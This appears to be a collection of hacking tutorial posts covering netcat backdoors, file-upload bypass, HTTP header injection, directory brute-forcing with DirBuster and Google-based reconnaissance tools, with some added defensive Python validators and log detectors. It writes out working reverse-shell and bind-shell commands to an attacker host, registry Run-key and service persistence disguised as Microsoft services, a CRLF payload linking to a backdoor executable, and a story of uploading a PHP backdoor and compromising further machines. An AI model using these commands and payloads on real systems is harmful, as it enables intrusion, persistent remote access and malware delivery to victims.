Simple backdoor using netcat:

Windows server mode:

nc -L -p 1337 -e cmd.exe

-L listen "harder": re-listen after the client disconnects (Windows build only).
-e run the given program and attach it to the connection.

Linux/Unix server mode:

nc -l -p 1337 -e /bin/bash

-e attaches /bin/bash to the connection. The traditional netcat shown in the help above exits after one session, and its -k only sets SO_KEEPALIVE on the socket, so wrap the command in a loop if you want it to keep listening: while true; do nc -l -p 1337 -e /bin/bash; done

Connect to the server:

nc -vv targetip 1337

How about a reverse connection? Try the following on the victim machine:

nc -e cmd -d attackerip 1337

(-d detaches netcat from the console on Windows.) On your own computer (attacker):

nc -vv -l -p 1337

The victim connects out to you, which gets through firewalls that block inbound connections but allow outbound ones; loop the listener as above if you want it to survive a disconnect.

Now you are wondering how a hacker gets netcat onto the victim's computer, right?

1. They first compromise the target system/server. They want permanent access to the victim machine, so they upload a backdoor and register it as a startup item.
2. They create a batch file, shell script or downloader and send it to the victim (undetected by AV). When the victim runs the script, it downloads and installs the backdoor automatically.

So how do you make netcat a stealthy backdoor? By editing the registry or dropping it in the startup folder. Suppose you compromised an IIS web server and uploaded the cmdasp.asp web shell; now you want to install netcat as a persistent backdoor.

Netcat as a startup backdoor:

Run this command:

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v microsoft_service /t REG_SZ /d "c:\nc.exe -d attackerip 1337 -e cmd.exe"

Create a netcat listener on your own computer. Whenever the victim reboots, the machine connects back to you (the Run key fires at user logon, so someone has to log in for it to trigger).

How about netcat as a service? Try:

sc create microsoft_update binpath= "cmd /K start c:\nc.exe -d attackerip 1337 -e cmd.exe" start= auto error= ignore

(sc requires the space after each option=.) Now try to make the backdoor connect to you on a schedule (hint: the at command).

By the way, you can do much more with netcat. It is not a bad backdoor as it is, and if you edit netcat's C source it can become a super backdoor.
Try more...

More about it:

www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
en.wikipedia.org/wiki/Netcat
www.securityfocus.com/tools/139  (Download for windows)


Exploiting file upload vulnerability


I did my job very quickly after finding a file upload vulnerability in a website. I was pentesting a network remotely (black-box testing) and it was really hard. I often browsed their website. I was not even able to ping their IP because of the firewall. The only things left for me to try were social engineering and web pentesting (really, I was confused! If the SE and web hacking methods did not work my heart was about to give out, lol (my heart is not weak)). Anyway, I scanned the site with various vulnerability scanners... no luck! So I started browsing the site manually (and Googling randomly, truthfully not knowing what to look for).

Suddenly I found a personal file upload link, which was hell to find, but my Google friend helped me a lot. The link was like: www.hired-me.org/test/personal/re_al/file2010.php . It accepted only 3 file extensions: JPEG, TEXT, CSV. At first I did not think this link had any vulnerability (I was already confused by the fucking scanner!).

How i exploited:

First I uploaded a jpeg file and tried to find where it was saved. That was also hard (my knowledge sucks?). At least I found the jpeg at www.hired-me.com/index/hidden/director/test.jpeg , so everything was okay. Now I quickly created a php file [test.php]:

<?php
echo "This is test";
?>

I quickly tried to upload "test.php" and "test.jpeg.php" but got the error "Unknown File Extension". This error made me sure that the file extension was being filtered.

Then I renamed "test.php" to "test.php.jpeg". Now no error! Wow!
I quickly checked www.hired-me.com/index/hidden/director/test.php.jpeg and the page displayed "This is test". Then I decided to upload a real php backdoor, uploaded some rooting tools, set up ssh and compromised two additional machines. Job done!

Feedback is welcome!
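The author never saw the target's upload filter, so the Python below is an added example, not code from the post or the target: vulnerable_accept is my reconstruction of a last-extension check that behaves the way the post describes (test.php.jpeg accepted, test.jpeg.php rejected), and hardened_name and content_matches show what a check that survives the double-extension trick looks like. The allow-list is taken from the post; the rule set, names and sample bytes are assumptions for the demo. The reason the bypass executes at all is that Apache's mod_mime looks at every extension in a file name, so with a .php handler configured, test.php.jpeg is still run as PHP.

```python
"""Upload extension filter: the bypassable version next to a hardened one.
Added example; the vulnerable function is a reconstruction, not the target's code."""
import os
import re
import secrets

ALLOWED = {"jpeg", "jpg", "txt", "csv"}   # the post's allow-list (jpg added)


def vulnerable_accept(filename: str) -> bool:
    """Looks only at the last extension. test.php.jpeg passes; on Apache with a
    .php handler, mod_mime evaluates every extension, so it still runs as PHP."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED


def hardened_name(filename: str) -> str:
    """Validate and return a server-generated name; raise ValueError otherwise.
    Rules: exactly one extension, from the allow-list; a plain ASCII stem; and
    the client-chosen name is never used on disk (so no .htaccess, no traversal)."""
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        raise ValueError("exactly one extension required")
    stem, ext = parts
    if ext not in ALLOWED:
        raise ValueError(f"extension .{ext} not allowed")
    if not re.fullmatch(r"[a-z0-9_-]{1,64}", stem):
        raise ValueError("unexpected characters in file name")
    return f"{secrets.token_hex(8)}.{ext}"


def rejects(filename: str) -> bool:
    """True when hardened_name refuses the name."""
    try:
        hardened_name(filename)
    except ValueError:
        return True
    return False


MAGIC = {"jpeg": b"\xff\xd8\xff", "jpg": b"\xff\xd8\xff"}   # JPEG SOI marker


def content_matches(ext: str, data: bytes) -> bool:
    """Second line of defence: the bytes must look like the claimed type.
    Text types get a cheap check: no NUL bytes and no '<?' (PHP open tag) in the head."""
    if ext in MAGIC:
        return data.startswith(MAGIC[ext])
    head = data[:4096]
    return b"\x00" not in head and b"<?" not in head


if __name__ == "__main__":
    for name in ("photo.jpeg", "test.php.jpeg", "test.jpeg.php", ".htaccess", "../x.csv"):
        print(f"{name:16} vulnerable={vulnerable_accept(name)!s:5} hardened_rejects={rejects(name)}")
```

Store the returned random name outside the web root, or in a directory where script execution is disabled, since the extension check alone is not what keeps uploaded PHP from running.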

    

HTTP header injection


If we can inject newline into the header we control , then we will be able to insert some additional HTTP Header and some nasty body text. I don’t think so that we can compromised a website/server via this vulnerability. But still it is power for Social Engineering attack, Phishing, Redirecting to malicious site, downloading backdoor, virtual defacement, sometime injecting cookie  etc. It is much like XSS.

Basically this vulnerability is found in the "Set-Cookie" and "Location" headers. If we connect to a website:

nc -vv target.com 80
GET /something.php?id=1&pay=40000&method=credit HTTP/1.1
After this GET request we get a response containing something like (try to find it):

Set-Cookie: PaymentMethod=credit

If this is the behaviour of the host, then we should try to insert a carriage return and line feed:

nc -vv target.com 80  
GET /something.php?id=1&pay=40000&method=credit%0d%0a it-is=vulnerable HTTP/1.1

If the host is vulnerable, then it will reply with an additional line "it-is=vulnerable", like this:

Set-Cookie: PaymentMethod=credit

it-is=vulnerable

A hacker can simply force users to download a backdoor:

http://target.com/something.php?id=1&pay=40000&method=credit%0d%0a
Content-Length:+22%0d%0a%0d%0a<html>%0d%0a<a href=www.evilhacker.com/backdoor.exe>Please update first</a>%0d%0a</html>%0d%0aHTTP/1.1

We can also create a fake cookie and send the URL to the poor victim. Just think smartly and you will find other ways 😉

Be aware!!!
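To show what the CRLF in the query string does on the server side, and how to close the hole, here is an added Python example (it is not from the original post): the unsafe pattern that copies the decoded method parameter straight into Set-Cookie, the hardened version that refuses control characters, and a small detector that flags access-log entries whose URL decodes to CR or LF. The function names and the log lines are constructed for the example; the log lines reuse the request shape shown above.

```python
import re
from urllib.parse import unquote

# CR and LF are what separate one header line from the next in HTTP/1.1.
CRLF_RE = re.compile(r"[\r\n]")


def build_cookie_header_unsafe(method: str) -> str:
    """Vulnerable pattern: the decoded query parameter is copied straight into a header."""
    return f"Set-Cookie: PaymentMethod={method}"


def header_lines(raw: str):
    """How a client splits a header block: on CRLF. Shows the injected extra line."""
    return raw.split("\r\n")


def safe_header_value(value: str) -> str:
    """Reject any CR, LF or other control character before the value reaches a header."""
    if CRLF_RE.search(value) or any(ord(c) < 32 or ord(c) == 127 for c in value):
        raise ValueError("control character in header value")
    return value


def build_cookie_header(method: str) -> str:
    """Hardened version of build_cookie_header_unsafe()."""
    return f"Set-Cookie: PaymentMethod={safe_header_value(method)}"


# Request target inside a common-log-format line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def flag_crlf_requests(log_lines):
    """Return request targets from access-log lines whose URL decodes to a CR or LF.
    Decoding twice also catches the double-encoded %250d%250a form."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group(1)
        if CRLF_RE.search(unquote(unquote(target))):
            hits.append(target)
    return hits


# Constructed access-log lines for the example (common log format, made-up addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2012:13:55:36 +0000] "GET /something.php?id=1&pay=40000&method=credit HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2012:13:55:41 +0000] "GET /something.php?id=1&pay=40000&method=credit%0d%0ait-is=vulnerable HTTP/1.1" 200 512',
    '198.51.100.4 - - [10/Oct/2012:13:56:02 +0000] "GET /index.php?page=%250d%250aX-Injected:%201 HTTP/1.1" 200 300',
]
```

Modern web frameworks apply the same check as safe_header_value() inside their header-setting APIs; the hole appears when code writes headers by hand, as the netcat exchange above suggests the target did.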

Finding Hidden File and directory of target website


Discovering hidden files and directories is important for hackers and penetration testers. Many webmasters/developers leave default files, configuration files, admin pages and database files insecurely exposed. For example, many times I was able to read a database file (such as db.sql), a configuration file (such as config.php) etc. But some 10% of clever developers rename these files too. Anyway, finding hidden files is an important technique of information gathering and of finding vulnerabilities.

We can do this by brute force and dictionary attacks, but it may take a very long time, and the target may also get DDoSed.

How it works: Imagine our target site is www.false.com. It has a user login page, www.false.com/admini, for logging in users. But we need to find the real administrator page so that we can log in to edit their site, right? We also tried manually (several times) submitting some random URLs like www.false.com/administrator, or admni etc., but no luck. Instead of doing this manually we have tools to do it automatically and fast. The tool submits many candidate directory and file names and we have to understand the HTTP response codes (do you know about 400, 403, 200 etc.?). This is not only for finding admin pages but also for finding configuration files, interesting directories, default files/directories and even vulnerabilities (so we can call it URL fuzzing).

Warning: Remember that every failed request will be logged in the server's error log (error.log / error_log). So there is some worry about getting caught and about DDoSing the target.

There are many tools, such as DirBuster, Burp Suite or custom Python scripts, which we can download to do this job. But I am going to show you OWASP DirBuster (go to owasp.org to download it).

When we open DirBuster (java -jar dirbuster.jar), we get:

I have installed Joomla locally (directory: /var/www/joomla), so I am going to attack my own site like this:

Here my target URL is 192.168.1.214. I ticked "Go Faster" so that it attacks more quickly, and chose the dictionary file (/pentest/web/dirbuster/directory-list-1.0.txt). I want to fuzz my Joomla site; Joomla is installed in the /joomla directory (192.168.1.214/joomla) and PHP is the default file extension to be fuzzed.
Finally, click "Start".

Here we see the Type, Found, Response, Size, Include and Status columns.
"Type" tells us whether it is a file or a directory; "Found" is what DirBuster found; "Response" is the HTTP status code (200 = OK, 404 = Not Found, 403 = Forbidden etc.); "Size" is the size in KB/MB of the page or directory (sometimes interesting when a found page/directory has a very different size from the rest); "Status" tells us whether the tool is still working.
Now simply browse all the found files and directories. Sometimes you may get a blank page, for example when I try to browse 192.168.1.214/joomla/configuration.php, because it is not readable. If a foolish developer or webmaster chmods it so that it is readable, then he is fucked.

We see in the output that DirBuster found the "administrator" page (joomla/administrator/index.php) and the configuration file (joomla/configuration.php), which are really interesting.
Perhaps we can do some malicious things like LFI, SQLi etc. Just think a little about it.
Let me know if you catch any mistake (I love to learn)....
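The warning above that every guess ends up in the server's logs is also the defender's opportunity. Added example, not part of the original post: a Python detector that parses common-log-format access-log lines and alerts on any client producing 20 or more 403/404 responses within 60 seconds, the trace a DirBuster run against /joomla leaves behind. The sample log is constructed inline with a made-up scanner address (192.168.1.50) and an ordinary visitor (192.168.1.20); the threshold and window are assumptions to tune per site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Common log format: ip ident user [timestamp] "METHOD path HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Return (ip, timestamp, path, status) or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("path"), int(m.group("status"))


def detect_dir_bruteforce(lines, threshold=20, window=timedelta(seconds=60)):
    """Return {ip: (count, sample_paths)} for clients that produced at least
    `threshold` 403/404 responses inside any `window`-long span of the log."""
    recent = defaultdict(deque)   # per-IP sliding window of (timestamp, path)
    alerts = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, path, status = parsed
        if status not in (403, 404):
            continue
        q = recent[ip]
        q.append((ts, path))
        while q and ts - q[0][0] > window:   # drop entries older than the window
            q.popleft()
        if len(q) >= threshold and ip not in alerts:
            alerts[ip] = (len(q), [p for _, p in list(q)[:5]])
    return alerts


def _fmt(ip, ts, path, status):
    """Render one constructed common-log-format line."""
    return f'{ip} - - [{ts.strftime("%d/%b/%Y:%H:%M:%S %z")}] "GET {path} HTTP/1.1" {status} 203'


def make_sample_log():
    """Constructed log: one client guessing names under /joomla/ once per second,
    plus an ordinary visitor who makes a single typo. Addresses are made up."""
    base = datetime(2012, 10, 10, 13, 55, 0, tzinfo=timezone.utc)
    guesses = ["admin", "administrator", "admini", "backup", "config", "db",
               "old", "test", "include", "tmp"]
    lines = []
    for i in range(30):
        path = f"/joomla/{guesses[i % len(guesses)]}{i}/"
        lines.append(_fmt("192.168.1.50", base + timedelta(seconds=i), path, 404))
    lines.append(_fmt("192.168.1.20", base + timedelta(seconds=5), "/joomla/", 200))
    lines.append(_fmt("192.168.1.20", base + timedelta(seconds=9), "/joomla/indx.php", 404))
    lines.append(_fmt("192.168.1.20", base + timedelta(seconds=12), "/joomla/index.php", 200))
    lines.sort(key=lambda l: parse_line(l)[1])   # interleave as a real log would be
    return lines
```

The "Go Faster" option mentioned above only makes this signature louder; a slowed-down scan spread over hours needs a longer window or a count of distinct 404 paths per client rather than a short burst threshold.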

Tools: metagoofil (File search)


All penetration testers and hackers search for files belonging to their target site because it is important for information gathering (custom passwords, internal knowledge about the company etc.). Google is the friend of the hacker or penetration tester. They search using Google-fu or automated tools such as metagoofil. Metagoofil is a good Python script for doing such a job.

How to use:

Simply type "./metagoofil.py" in the Terminal/Konsole and you will get all the options for using it.

They also give some examples of how to use it. But here is a practical usage:

root@bt:/pentest/enumeration/google/metagoofil# ./metagoofil.py -d microsoft.com -t doc,pdf -l 200 -n 50 -o microsoftfiles -f results.html

It will start searching and will automatically download the specified files (lol, be aware).

Now try it against your own site for practice.

I don't think that we need someone to teach us how to use tools.

Easy, man... So try everything!!!

Tools: goohost

Goohost is a simple Bash script that searches Google for information about the target website. It searches for IP addresses, subdomains and email addresses.

Usage example:

cd /pentest/enumeration/goohost

/pentest/enumeration/google/goohost# ./goohost.sh -t backtrack-linux.org -m ip -p 10 -v

Type ./goohost.sh for help...